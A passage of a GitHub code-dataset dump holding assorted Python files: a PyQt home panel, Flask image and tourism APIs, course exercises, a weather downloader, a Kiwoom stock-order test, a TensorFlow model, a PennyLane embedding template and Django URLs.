icon.addPixmap(QtGui.QPixmap(dir_path + \"/static/home-love-alt.png\"), QtGui.QIcon.Normal,\n QtGui.QIcon.On)\n self.tabs.addTab(self.home, icon, \"\")\n if x['ip'] == \"10.10.10.14\":\n self.hannahstatus.setPixmap(QtGui.QPixmap(dir_path + \"/static/hannah-home.png\"))\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(dir_path + \"/static/home-love.png\"), QtGui.QIcon.Normal,\n QtGui.QIcon.Off)\n icon.addPixmap(QtGui.QPixmap(dir_path + \"/static/home-love-alt.png\"), QtGui.QIcon.Normal,\n QtGui.QIcon.On)\n self.tabs.addTab(self.home, icon, \"\")\n\n elif income.find(\"weather\") == 2:\n data = income[9:]\n data = data[:2]\n self.outside_temp_temp.setText(_translate(\"MainWindow\", data+\"°F\"))\n self.outside_temp_scenes.setText(_translate(\"MainWindow\", data+\"°F\"))\n\ndef main():\n app = QApplication(sys.argv)\n ex = Ui_MainWindow()\n ex.show()\n sys.exit(app.exec_())\n\n## Execute\nif __name__ == '__main__':\n main()","repo_name":"hannahpatellis/scara","sub_path":"scara_panel/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":35102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1373698118","text":"from flask_restplus import Namespace, Resource, reqparse\nfrom flask_login import login_required, current_user\nfrom werkzeug.datastructures import FileStorage\nfrom flask import send_file\nfrom utils import *\n\nfrom config import Config\nfrom PIL import Image\nimport datetime\nimport os\nimport io\n\napi = Namespace('contents', description='Contents related operations')\n# create data storage directory\nos.makedirs(Config.CONTENT_DIRECTORY, exist_ok=True)\n# os.makedirs(Config.CAST_DATA_DIR, exist_ok=True)\n\nimage_all = reqparse.RequestParser()\nimage_all.add_argument('page', default=0, type=int)\nimage_all.add_argument('size', default=50, type=int, required=False)\nimage_all.add_argument('category', default='', type=str, required=False)\n\nimage_upload = reqparse.RequestParser()\nimage_upload.add_argument('category', location='args',\n type=str, default='COCO',\n help='File category')\nimage_upload.add_argument('file', location='files',\n type=FileStorage, required=True,\n help='PNG or JPG file')\n\nimage_download = reqparse.RequestParser()\nimage_download.add_argument('asAttachment', type=bool, default=False)\nimage_download.add_argument('width', type=int, default=512)\nimage_download.add_argument('height', type=int, default=512)\nimage_download.add_argument('category', default='', type=str, required=False)\nimage_download.add_argument('style_category', default='', type=str, required=False)\nimage_download.add_argument('content_category', default='', type=str, required=False)\nimage_download.add_argument(\n 'videoType', default='preview', type=str, required=False)\n\n\n@api.route('/')\nclass Contents(Resource):\n\n @api.expect(image_all)\n def get(self):\n \"\"\" Returns pageable content image\"\"\"\n args = image_all.parse_args()\n size = args['size']\n page = args['page']\n category = args['category']\n\n path = os.path.join(Config.CONTENT_DIRECTORY, category)\n\n if not os.path.exists(path):\n content_ids = []\n else:\n content_ids = [p for p in os.listdir(path) if os.path.isfile(os.path.join(path,p))]\n \n total = len(content_ids)\n pages = int(total / size)\n\n page_content_ids = []\n\n if (page + 1) * size > total and page * size < total:\n page_content_ids = content_ids[page*size:]\n else:\n page_content_ids = content_ids[page * size:(page+1)*size]\n\n\n return {\n \"total\": total,\n \"pages\": pages,\n \"page\": page,\n \"size\": size,\n \"content_ids\": page_content_ids \n }\n\n @api.expect(image_upload)\n def post(self):\n \"\"\" Creates an image \"\"\"\n args = image_upload.parse_args()\n image = args['file']\n category = args['category']\n\n print(category)\n\n directory = os.path.join(Config.CONTENT_DIRECTORY, category)\n os.makedirs(directory,exist_ok=True)\n path = os.path.join(directory,image.filename)\n\n # if os.path.exists(path):\n # return {'message': 'file already exists'}, 400\n\n pil_image = Image.open(io.BytesIO(image.read()))\n\n pil_image.save(path)\n\n image.close()\n pil_image.close()\n return image.filename\n\n\n@api.route('/')\nclass ContentId(Resource):\n\n @api.expect(image_download)\n def get(self, content_id):\n \"\"\" Returns category by ID \"\"\"\n args = image_download.parse_args()\n as_attachment = args.get('asAttachment')\n category = args.get('category')\n\n content_name = os.path.splitext(content_id)[0]\n fmt = os.path.splitext(content_id)[1].lower()\n\n path = os.path.join(Config.CONTENT_DIRECTORY,\n category, f'{content_id}')\n if not os.path.exists(path):\n print(f'Content do not exist in {path}')\n return\n\n width = args.get('width')\n height = args.get('height')\n\n if is_photo(fmt):\n return send_img(path, content_id, width, height, as_attachment)\n\n elif is_video(fmt):\n video_type = args.get('videoType')\n if video_type == 'preview':\n preview_path = os.path.join(Config.CONTENT_DIRECTORY,\n category, content_name, 'preview.png')\n return send_img(preview_path, 'preview.png', width, height, as_attachment)\n elif video_type == 'video':\n return send_file(path, attachment_filename=content_id, as_attachment=as_attachment)\n","repo_name":"LuletterSoul/sast_backend","sub_path":"api/contents.py","file_name":"contents.py","file_ext":"py","file_size_in_byte":4604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32621946020","text":"class Image:\n #inits image class\n def __init__(self, name):\n f = open(name, \"r\")\n\n f.readline()\n widthAndHeight = f.readline().split()\n width = int(widthAndHeight[0])\n height = int(widthAndHeight[1])\n colorDepth = int(f.readline())\n self.name = name\n self.width = width\n self.height = height\n self.colorDepth = colorDepth\n f.close()\n f = open(name, \"r\")\n content = []\n for line in f:\n content.append(line)\n self.content = content\n#decodes hidden image into result ppm\n#none -> none\n def decoder(self):\n imageList = []\n currentPixel = []\n count = 0\n print(self.content[3])\n for color in range(3, (self.height * self.width * 3) + 3):\n currentPixel.append(int(image.content[color]))\n count += 1\n if count == 3:\n count = 0\n imageList.append(currentPixel)\n currentPixel = []\n print(len(imageList) * 3)\n\n for pixel in imageList:\n if pixel[0] * 10 > self.colorDepth:\n pixel[0] = self.colorDepth\n else:\n pixel[0] = pixel[0] * 10\n pixel[1] = pixel[0]\n pixel[2] = pixel[0]\n newFile = open(\"result.ppm\", \"w\")\n newFile.write(\"P3\\n\")\n newFile.write(str(self.width) + \" \" + str(self.height) + \"\\n\")\n newFile.write(str(self.colorDepth) + \"\\n\")\n for pixel in imageList:\n for color in pixel:\n newFile.write(str(color) + \"\\n\")\n\n\n\n\nimage = Image(\"hidden.ppm\")\n\nimage.decoder()\n","repo_name":"rah1236/CPE101","sub_path":"Lab8/hidden.py","file_name":"hidden.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25486933617","text":"\"\"\"\r\nMidterm Exam Programming Questions from MIT 6.00.1x Course\r\nAuthor: Gareth Mawer\r\n\"\"\"\r\n\r\n# Problem 4, previous problems were multiple choice questions\r\ndef closest_power(base, num):\r\n '''\r\n base: base of the exponential, integer > 1\r\n num: number you want to be closest to, integer > 0\r\n Find the integer exponent such that base**exponent is closest to num.\r\n Note that the base**exponent may be either greater or smaller than num.\r\n In case of a tie, return the smaller value.\r\n Returns the exponent.\r\n '''\r\n def isSmaller(a, b):\r\n if abs(a) <= b:\r\n return a\r\n else:\r\n return b\r\n exponent1 = 0\r\n exponent2 = 1\r\n while base**exponent1 <= num:\r\n if base**exponent2 >num and base**exponent1 - num == isSmaller(base**exponent1 - num, base**exponent2 - num):\r\n return exponent1\r\n elif base**exponent2 >num and base**exponent2 - num == isSmaller(base**exponent1 - num, base**exponent2 - num):\r\n return exponent2\r\n else:\r\n exponent1 += 1\r\n exponent2 += 1\r\n\r\n# Problem 5\r\ndef dotProduct(listA, listB):\r\n \"\"\"\r\n listA: a list of numbers\r\n listB: a list of numbers of the same length as listB\r\n \r\n Returns the dot product of all the numbers in the lists.\r\n \"\"\"\r\n dotProd = 0\r\n for num in range(len(listA)):\r\n prod = listA[num] * listB[num]\r\n dotProd = dotProd + prod\r\n return dotProd\r\n\r\n\r\n# Problem 6\r\n# If L = [[1, 2], [3, 4], [5, 6, 7]], then deep_reverse(L) gives [[7, 6, 5], [4, 3], [2, 1]]\r\ndef deep_reverse(L):\r\n \"\"\" assumes L is a list of lists whose elements are ints\r\n Mutates L such that it reverses its elements and also \r\n reverses the order of the int elements in every element of L. \r\n It does not return anything.\r\n \"\"\"\r\n L.reverse()\r\n for i in L:\r\n if type(i) == list:\r\n deep_reverse(i)\r\n\r\n# Problem 7 - Must mutate list\r\n\r\n# Example 1\r\n# If f(a, b) returns a + b, d1 = {1:30, 2:20, 3:30, 5:80}, d2 = {1:40, 2:50, 3:60, 4:70, 6:90}\r\n# then dict_interdiff(d1, d2) returns ({1: 70, 2: 70, 3: 90}, {4: 70, 5: 80, 6: 90})\r\n\r\n# Example 2\r\n# If f(a, b) returns a > b, d1 = {1:30, 2:20, 3:30}, d2 = {1:40, 2:50, 3:60}\r\n# then dict_interdiff(d1, d2) returns ({1: False, 2: False, 3: False}, {})\r\n\r\ndef dict_interdiff(d1, d2):\r\n '''\r\n d1, d2: dicts whose keys and values are integers\r\n Returns a tuple of dictionaries according to the instructions above\r\n '''\r\n tupDict = []\r\n tupDict1 = []\r\n for i in d1.keys():\r\n if i in d2.keys():\r\n tupDict.append((i, (f(d1[i], d2[i]))))\r\n elif i not in d2.keys():\r\n tupDict1.append((i, d1[i]))\r\n for i in d2.keys():\r\n if i not in d1.keys():\r\n tupDict1.append((i, d2[i]))\r\n return (dict(tupDict), dict(tupDict1))\r\n\r\n# Problem 8\r\n\r\n# =================================\r\n# Example\r\n# def f(i):\r\n# return i + 2\r\n# def g(i):\r\n# return i > 5\r\n\r\n# L = [0, -10, 5, 6, -4]\r\n# print(applyF_filterG(L, f, g)) --> 6\r\n# print(L) --> [5, 6]\r\n# =================================\r\n\r\ndef applyF_filterG(L, f, g):\r\n \"\"\"\r\n Assumes L is a list of integers\r\n Assume functions f and g are defined for you. \r\n f takes in an integer, applies a function, returns another integer \r\n g takes in an integer, applies a Boolean function, \r\n returns either True or False\r\n Mutates L such that, for each element i originally in L, L contains \r\n i if g(f(i)) returns True, and no other elements\r\n Returns the largest element in the mutated L or -1 if the list is empty\r\n \"\"\"\r\n def test(l):\r\n if len(l) == 0:\r\n return True\r\n l = L[:]\r\n for i in l:\r\n f(i)\r\n if not g(f(i)):\r\n L.remove(i)\r\n if test(L):\r\n return -1\r\n else:\r\n return max(L)\r\n\r\n# Problem 9\r\ndef flatten(aList):\r\n ''' \r\n aList: a list \r\n Returns a copy of aList, which is a flattened version of aList \r\n '''\r\n H = aList[:]\r\n L = []\r\n j = 0\r\n for i in range(len(H)):\r\n if type(H[i]) == list:\r\n j += i + abs((len(L) - len(H)))\r\n L = L + flatten(H[i])\r\n else:\r\n j += 1\r\n L.insert(j, H[i])\r\n aList = L\r\n return aList\r\n\r\n# Attempt 2 at Problem 9\r\ndef flatten1(l):\r\n L = []\r\n for element in l:\r\n if type(element) == list:\r\n L = L + flatten1(element)\r\n else:\r\n L.append(element)\r\n return L\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Gareth-Mawer/edX","sub_path":"MIT 6.001x/Midterm Exam/midterm.py","file_name":"midterm.py","file_ext":"py","file_size_in_byte":4521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31662436468","text":"import random\n\n\ndef coin_toss(coin_tosses = 1000000):\n head_count = 0\n tail_count = 0\n\n\n for x in range(coin_tosses):\n toss = random.choice([\"H\", \"T\"])\n if toss == \"H\":\n head_count = head_count + 1\n else:\n tail_count = tail_count + 1\n\n print(f\"Heads: {head_count}\")\n print(f\"Tails: {tail_count}\")","repo_name":"coolavy/nsf_2021","sub_path":"Homework_Week_7/practice/code_session_1/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"27196291340","text":"import os\nimport logging\nimport requests\nimport threading\nfrom queue import Queue, Empty\nfrom datetime import date, timedelta\n\nfrom cycling_data_downloader import download_file, make_output_dirs\n\nlogger = logging.getLogger(__name__)\n\n\ndef download_weather(dl_queue, key, dl_dir, city):\n URL = 'http://api.worldweatheronline.com/premium/v1/past-weather.ashx?key={}&q={}&format=json&tp=1&date={}&enddate={}'\n while not dl_queue.empty():\n try:\n start, end = dl_queue.get(block=False)\n start = start.isoformat()\n end = end.isoformat()\n url = URL.format(key, city, start, end)\n filename = f\"{start.replace('-', '_')}-{end.replace('-', '_')}.json\"\n path = os.path.join(dl_dir, filename)\n logger.info(f'Downloading from {url}')\n download_file(url, path)\n dl_queue.task_done()\n except Empty:\n break\n\ndef init_weather_download(api_key, dl_dir, city):\n start_date = date(year=2012, month=1, day=1)\n end_date = date(year=2019, month=11, day=1)\n interval = timedelta(days=35)\n day = timedelta(days=1)\n\n dl_queue = Queue()\n\n while start_date < end_date:\n dl_queue.put((start_date, start_date + interval))\n start_date += interval + day\n\n make_output_dirs([dl_dir])\n\n num_dl_threads = 6\n for i in range(num_dl_threads):\n t = threading.Thread(target=download_weather, args=(dl_queue, api_key, dl_dir, city))\n t.start()\n\n dl_queue.join()\n\nif __name__ == '__main__':\n import sys\n import configs\n configs.configure_logging()\n key = sys.argv[1]\n init_weather_download(key, configs.weather_data_dl_dir, configs.weather_data_city)\n","repo_name":"Krismix1/data-science-mandatory-2","sub_path":"weather_download.py","file_name":"weather_download.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33681875954","text":"from typing import Any, Optional\n\nimport discord\n\n\nclass Embed(discord.Embed):\n def __init__(self, executed: Optional[str] = None, requested: Optional[str] = None, colour=0x10B981, **kwargs):\n super().__init__(colour=colour, **kwargs)\n\n if executed:\n self.set_footer(text=f\"Executed by {executed}\")\n\n if requested:\n self.set_footer(text=f\"Requested by {requested}\")\n\n def add_field(self, *, name: Any, value: Any, inline: bool = True, title: bool = True):\n super().add_field(name=name.title() if title else name, value=value, inline=inline)\n","repo_name":"Korino-Development/Korii-Bot","sub_path":"utils/subclasses/embed.py","file_name":"embed.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8575113260","text":"import sys\n\nfrom PyQt5.QAxContainer import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\n\nclass openapi(QAxWidget):\n def __init__(self):\n super().__init__()\n\n self.setControl(\"KHOPENAPI.KHOpenAPICtrl.1\")\n self.OnEventConnect.connect(self.eventConnect)\n self.OnReceiveMsg.connect(self.receiveMsg)\n self.OnReceiveTrData.connect(self.receiveTrData)\n self.OnReceiveChejanData.connect(self.receiveChejanData)\n\n self.dynamicCall('CommConnect()')\n self.logineventloop = QEventLoop()\n self.logineventloop.exec_()\n self.treventloop = QEventLoop()\n self.chejaneventloop = QEventLoop()\n self.apitest()\n\n #self.buystock(\"005930\", 1)\n #self.sellstock(\"005930\", 1)\n\n def eventConnect(self, nErrCode):\n if nErrCode == 0:\n print('로그인 성공')\n self.logineventloop.exit()\n elif nErrCode == -100:\n print('사용자 정보교환 실패')\n elif nErrCode == -101:\n print('서버접속 실패')\n elif nErrCode == -102:\n print('버전처리 실패')\n\n def receiveMsg(self, sScrNo, sRQName, sTrCode, sMsg):\n print('receiveMsg', sScrNo, sRQName, sTrCode, sMsg)\n\n def setinputvalue(self, sID, # // TR에 명시된 Input이름\n sValue): # // Input이름으로 지정한 값\n self.dynamicCall(\"SetInputValue(QString, QString)\", sID, sValue)\n\n def commrqdata(self, sRQName, # // 사용자 구분명 (임의로 지정, 한글지원)\n sTrCode, # // 조회하려는 TR이름\n nPrevNext, # // 연속조회여부\n sScreenNo ): # // 화면번호 (4자리 숫자 임의로 지정)\n self.dynamicCall(\"CommRqData(QString, QString, int, QString)\", sRQName, sTrCode, nPrevNext, sScreenNo)\n self.treventloop = QEventLoop()\n self.treventloop.exec_()\n\n def receiveTrData(self, sScrNo, # // 화면번호\n sRQName, #// 사용자 구분명\n sTrCode, #// TR이름\n sRecordName, #// 레코드 이름\n sPrevNext, #// 연속조회 유무를 판단하는 값 0: 연속(추가조회)데이터 없음, 2:연속(추가조회) 데이터 있음\n nDataLength, #// 사용안함.\n sErrorCode, #// 사용안함.\n sMessage, #// 사용안함.\n sSplmMsg): #// 사용안함\n print('receiveTrData ', sScrNo, sRQName, sTrCode)\n self.treventloop.exit()\n\n def receiveChejanData(self,\n sGubun, #// 체결구분. 접수와 체결시 '0'값, 국내주식 잔고변경은 '1'값, 파생잔고변경은 '4'\n nItemCnt,\n sFIdList):\n print('receiveChejanData {} {} {}'.format(sGubun, nItemCnt, sFIdList))\n\n stockcode = self.dynamicCall(\"GetChejanData(int)\", 9001)\n print('종목코드 = ' + stockcode)\n stime = self.dynamicCall(\"GetChejanData(int)\", 908)\n print('체결시간 = ' + stime)\n sname = self.dynamicCall(\"GetChejanData(int)\", 302)\n print('종목명 = ' + sname)\n sname = self.dynamicCall(\"GetChejanData(int)\", 902)\n print('미체결수량 = ' + sname)\n buyprice = self.dynamicCall(\"GetChejanData(int)\", 910)\n print('체결가 = ' + buyprice)\n\n self.chejaneventloop.exit()\n pass\n\n def apitest(self):\n self.setinputvalue(\"종목코드\", \"039490\")\n self.setinputvalue(\"기준일자\", \"20160101\")\n self.setinputvalue(\"수정주가구분\", \"1\")\n lRet = self.commrqdata(\"RQName\", \"OPT10081\", \"0\", \"0600\")\n\n\n \"\"\"\n [주문처리단계]\n 주문 처리 순서\n SendOrder(주문발생) -> OnReceiveTRData(주문응답) -> OnReceiveMsg(주문메세지수신) -> OnReceiveChejan(주문접수/체결)\n ※ 주의(역전현상) : 주문건수가 폭증하는 경우 OnReceiveChejan 이벤트가 OnReceiveTRData 이벤트보다 앞서 수신될 수 있습니다. \n\n [거래구분]\n 00 : 지정가\n 03 : 시장가\n 05 : 조건부지정가\n 06 : 최유리지정가\n 07 : 최우선지정가\n 10 : 지정가IOC\n 13 : 시장가IOC\n 16 : 최유리IOC\n 20 : 지정가FOK\n 23 : 시장가FOK\n 26 : 최유리FOK\n 61 : 장전시간외종가\n 62 : 시간외단일가매매\n 81 : 장후시간외종가\n ※ 모의투자에서는 지정가 주문과 시장가 주문만 가능합니다.\n \"\"\"\n\n def sendorder(self,\n sRQName, #// 사용자 구분명\n sScreenNo, #// 화면번호\n sAccNo, #// 계좌번호 10자리\n nOrderType, #// 주문유형 1:신규매수, 2:신규매도 3:매수취소, 4:매도취소, 5:매수정정, 6:매도정정\n sCode, #// 종목코드 (6자리)\n nQty, #// 주문수량\n nPrice, #// 주문가격\n sHogaGb, # // 거래구분(혹은 호가구분)은 아래 참고\n sOrgOrderNo): # // 원주문번호. 신규주문에는 공백 입력, 정정/취소시 입력합니다.\n\n self.dynamicCall(\"SendOrder(Qstring, QString, QString, int, QString, int, int, QString, QString)\",\n [sRQName, sScreenNo, sAccNo, nOrderType, sCode, nQty, nPrice, sHogaGb, sOrgOrderNo])\n\n self.chejaneventloop.exec_()\n pass\n\n \"\"\"\n receiveMsg 1001 sendorder_req KOA_NORMAL_BUY_KP_ORD [100000] 모의투자 매수주문완료\n receiveTrData 1001 sendorder_req KOA_NORMAL_BUY_KP_ORD\n receiveChejanData 0 35 9201;9203;9205;9001;912;913;302;900;901;902;903;904;905;906;907;908;909;910;911;10;27;28;914;915;938;939;919;920;921;922;923;949;10010;969;819\n 체결가 = \n receiveChejanData 0 35 9201;9203;9205;9001;912;913;302;900;901;902;903;904;905;906;907;908;909;910;911;10;27;28;914;915;938;939;919;920;921;922;923;949;10010;969;819\n 체결가 = 70300\n receiveChejanData 1 34 9201;9001;917;916;302;10;930;931;932;933;945;946;950;951;27;28;307;8019;957;958;918;990;991;992;993;959;924;10010;25;11;12;306;305;970\n 체결가 = \n \"\"\"\n def buystock(self, code, qty):\n self.sendorder(\"sendorder_req\", \"1001\", \"8008681611\", 1, code, qty, 0, \"03\", \"\")\n\n\n \"\"\"\n receiveMsg 1001 sendorder_req KOA_NORMAL_SELL_KP_ORD [100000] 모의투자 매도주문완료\n receiveTrData 1001 sendorder_req KOA_NORMAL_SELL_KP_ORD\n receiveChejanData 0 35 9201;9203;9205;9001;912;913;302;900;901;902;903;904;905;906;907;908;909;910;911;10;27;28;914;915;938;939;919;920;921;922;923;949;10010;969;819\n 종목코드 = A005930\n 체결시간 = 152912\n 종목명 = 삼성전자 \n 미체결수량 = 2\n 체결가 = \n receiveChejanData 1 34 9201;9001;917;916;302;10;930;931;932;933;945;946;950;951;27;28;307;8019;957;958;918;990;991;992;993;959;924;10010;25;11;12;306;305;970\n 종목코드 = A005930\n 체결시간 = \n 종목명 = 삼성전자 \n 미체결수량 = \n 체결가 = \n \"\"\"\n def sellstock(self, code, qty):\n self.sendorder(\"sendorder_req\", \"1001\", \"8008681611\", 2, code, qty, 0, \"03\", \"\")\n\n\napp = QApplication(sys.argv)\nopenapi()","repo_name":"jeroky3/autobot","sub_path":"kiwoomopenapitest.py","file_name":"kiwoomopenapitest.py","file_ext":"py","file_size_in_byte":7243,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"32942658580","text":"import tensorflow as tf\nfrom tensorflow.keras import Model\nfrom tensorflow.keras import layers, activations, Input\n\n\nclass ModelSequential(Model):\n def __init__(self, dense_info):\n super(ModelSequential, self).__init__()\n self.dense_list = []\n for cell_cnt, activ_func in dense_info:\n self.dense_list.append(layers.Dense(cell_cnt, activation=activ_func))\n\n # self.f1 = layers.Dense(6,activation='relu')\n # self.f2 = layers.Dense(4,activation='relu')\n # self.f3 = layers.Dense(1,activation='sigmoid')\n\n\n def call(self, x):\n dense_len = len(self.dense_list)\n i = 0\n while i < dense_len:\n x = self.dense_list[i](x)\n i = i + 1\n\n return x\n\n\ndef normalSequential():\n # 建立序列模型\n model = tf.keras.Sequential()\n # 添加隐藏层,神经元为6个,输入类型为一维数组的5个特征\n model.add(tf.keras.layers.Dense(6, input_shape=(5,), activation=tf.keras.activations.relu))\n model.add(tf.keras.layers.Dense(6, activation='relu'))\n model.add(tf.keras.layers.Dense(1, activation=tf.keras.activations.sigmoid))\n return model\n\n\n\nif __name__ == '__main__':\n dense_info = [(6, 'relu'), (6, 'relu'), (1, activations.sigmoid)]\n model = ModelSequential(dense_info)\n # model.build(input_shape=(5,))\n model.build(input_shape=())\n model.summary()\n","repo_name":"dandykang/py-ai","sub_path":"sunshine/models_copy.py","file_name":"models_copy.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33260522519","text":"import flask\nfrom flask import request, jsonify\n\nimport numpy as np\nimport pandas as pd\n\n\napp = flask.Flask(__name__)\n\n\ndef city_data(city):\n '''This function takes in the city and returns it df.\n '''\n cities = ['aurangabad', 'agra', 'delhi', 'goa', 'jaipur']\n if city in cities:\n df = pd.read_csv('./data/csv/' + city + '.csv')\n return df\n else:\n print(f'The city is not in list: {cities}')\n return None\n\n \ndef location_data_sorted(city):\n df = city_data(city)\n df['tourist'] = df[df['tag']=='tourist_attraction']['types'].apply(\\\n lambda x: \\\n True if(('travel_agency' not in x) and ('car_rental' not in \\\n x) and ('taxi_stand' not in x) and ('political' not \\\n in x) and ('lodging' not in x)) else False)\n df['n_type'] = df['name'].apply(lambda x: True if(('tours' not in \\\n x.lower()) and ('rental' not in x.lower()) and \\\n ('taxi' not in x.lower())) else False)\n req_df = df[(df['tourist']==True) & (df['n_type']==True)]\n tour = req_df.sort_values(by=['rating', 'user_ratings_total'], \n ascending=[False, False])[['name', 'rating']]\n df['rel']=df['types'].apply(lambda x: True if('place_of_worship' in x)\\\n else False)\n rel = df[df['rel']==True].sort_values(by=['rating', 'user_ratings_total'],\n ascending=[False, False])[['name', 'rating']]\n df['rest'] = df['types'].apply(lambda x: True if('restaurant' in x) else\\\n False)\n rest=df[df['rest']==True].sort_values(by=['rating', 'user_ratings_total'],\n ascending=[False, False])[['name', 'rating']]\n req_df = df[df['tag']=='lodging']\n lod = req_df.sort_values(by=['rating', 'user_ratings_total'],\n ascending=[False, False])[['name', 'rating']]\n df['park'] = df['types'].apply(lambda x: True if('campground' in x) or \n ('amusement_park' in x) or ('zoo' in x) else False)\n park = df[df['park']==True].sort_values(by=['rating','user_ratings_total'],\n ascending=[False, False])[['name', 'rating']]\n \n x = pd.DataFrame()\n x['tourist_attraction'] = tour['name'][:10].values\n x['religious'] = rel['name'][:10].values\n x['restaurant'] = rest['name'][:10].values\n x['lodging'] = lod['name'][:10].values\n x['parks'] = park['name'][:10].values\n x = x.to_json()\n return x\n\n\n@app.route(\"/\", methods=['GET'])\ndef get_data():\n if 'city' in request.args:\n city = request.args['city']\n data = location_data_sorted(city.lower())\n return data\n else:\n return \"Error: Please enter the following cities - ['aurangabad', 'agra', 'goa', 'delhi', 'jaipur'].\"\n \nif __name__ == '__main__':\n app.run(port=5000, debug=False)","repo_name":"shdangwal/VirTou","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31504407042","text":"r\"\"\"\nContains the BasisEmbedding template.\n\"\"\"\n# pylint: disable-msg=too-many-branches,too-many-arguments,protected-access\nimport pennylane as qml\nimport pennylane.numpy as np\nfrom pennylane.operation import Operation, AnyWires\nfrom pennylane.wires import Wires\n\n\nclass BasisEmbedding(Operation):\n r\"\"\"Encodes :math:`n` binary features into a basis state of :math:`n` qubits.\n\n For example, for ``features=np.array([0, 1, 0])`` or ``features=2`` (binary 10), the\n quantum system will be prepared in state :math:`|010 \\rangle`.\n\n .. warning::\n\n ``BasisEmbedding`` calls a circuit whose architecture depends on the binary features.\n The ``features`` argument is therefore not differentiable when using the template, and\n gradients with respect to the argument cannot be computed by PennyLane.\n\n Args:\n features (tensor_like): binary input of shape ``(len(wires), )``\n wires (Any or Iterable[Any]): wires that the template acts on\n\n Example:\n\n Basis embedding encodes the binary feature vector into a basis state.\n\n .. code-block:: python\n\n dev = qml.device('default.qubit', wires=3)\n\n @qml.qnode(dev)\n def circuit(feature_vector):\n qml.BasisEmbedding(features=feature_vector, wires=range(3))\n return qml.state()\n\n X = [1,1,1]\n\n The resulting circuit is:\n\n >>> print(qml.draw(circuit, expansion_strategy=\"device\")(X))\n 0: ──X─┤ State\n 1: ──X─┤ State\n 2: ──X─┤ State\n\n And, the output state is:\n\n >>> print(circuit(X))\n [0.+0.j 0.+0.j 0.+0.j 0.+0.j 0.+0.j 0.+0.j 0.+0.j 1.+0.j]\n\n Thus, ``[1,1,1]`` is mapped to :math:`|111 \\rangle`.\n\n \"\"\"\n\n num_wires = AnyWires\n grad_method = None\n\n def _flatten(self):\n basis_state = self.hyperparameters[\"basis_state\"]\n basis_state = tuple(basis_state) if isinstance(basis_state, list) else basis_state\n return tuple(), (self.wires, basis_state)\n\n @classmethod\n def _unflatten(cls, _, metadata) -> \"BasisEmbedding\":\n return cls(features=metadata[1], wires=metadata[0])\n\n def __init__(self, features, wires, id=None):\n if isinstance(features, list):\n features = qml.math.stack(features)\n\n tracing = qml.math.is_abstract(features)\n\n if qml.math.shape(features) == ():\n if not tracing and features >= 2 ** len(wires):\n raise ValueError(\n f\"Features must be of length {len(wires)}, got features={features} which is >= {2 ** len(wires)}\"\n )\n bin = 2 ** np.arange(len(wires))[::-1]\n features = qml.math.where((features & bin) > 0, 1, 0)\n\n wires = Wires(wires)\n shape = qml.math.shape(features)\n\n if len(shape) != 1:\n raise ValueError(f\"Features must be one-dimensional; got shape {shape}.\")\n\n n_features = shape[0]\n if n_features != len(wires):\n raise ValueError(\n f\"Features must be of length {len(wires)}; got length {n_features} (features={features}).\"\n )\n\n if not tracing:\n features = list(qml.math.toarray(features))\n if not set(features).issubset({0, 1}):\n raise ValueError(f\"Basis state must only consist of 0s and 1s; got {features}\")\n\n self._hyperparameters = {\"basis_state\": features}\n\n super().__init__(wires=wires, id=id)\n\n @property\n def num_params(self):\n return 0\n\n @staticmethod\n def compute_decomposition(wires, basis_state): # pylint: disable=arguments-differ\n r\"\"\"Representation of the operator as a product of other operators.\n\n .. math:: O = O_1 O_2 \\dots O_n.\n\n\n\n .. seealso:: :meth:`~.BasisEmbedding.decomposition`.\n\n Args:\n features (tensor-like): binary input of shape ``(len(wires), )``\n wires (Any or Iterable[Any]): wires that the operator acts on\n\n Returns:\n list[.Operator]: decomposition of the operator\n\n **Example**\n\n >>> features = torch.tensor([1, 0, 1])\n >>> qml.BasisEmbedding.compute_decomposition(features, wires=[\"a\", \"b\", \"c\"])\n [PauliX(wires=['a']),\n PauliX(wires=['c'])]\n \"\"\"\n if not qml.math.is_abstract(basis_state):\n ops_list = []\n for wire, bit in zip(wires, basis_state):\n if bit == 1:\n ops_list.append(qml.PauliX(wire))\n return ops_list\n\n ops_list = []\n for wire, state in zip(wires, basis_state):\n ops_list.append(qml.PhaseShift(state * np.pi / 2, wire))\n ops_list.append(qml.RX(state * np.pi, wire))\n ops_list.append(qml.PhaseShift(state * np.pi / 2, wire))\n\n return ops_list\n","repo_name":"PennyLaneAI/pennylane","sub_path":"pennylane/templates/embeddings/basis.py","file_name":"basis.py","file_ext":"py","file_size_in_byte":4851,"program_lang":"python","lang":"en","doc_type":"code","stars":1965,"dataset":"github-code","pt":"52"} +{"seq_id":"10991801190","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('products/', views.ProductListView.as_view(), name='product_list'),\n path('products/create/', views.ProductCreateView.as_view(), name='product_create'),\n path('products//', views.ProductDetailView.as_view(), name='product_detail'),\n path('products//update/', views.ProductUpdateView.as_view(), name='product_update'),\n path('categories/', views.ProductCategoryListView.as_view(), name='category_list'),\n path('categories/create', 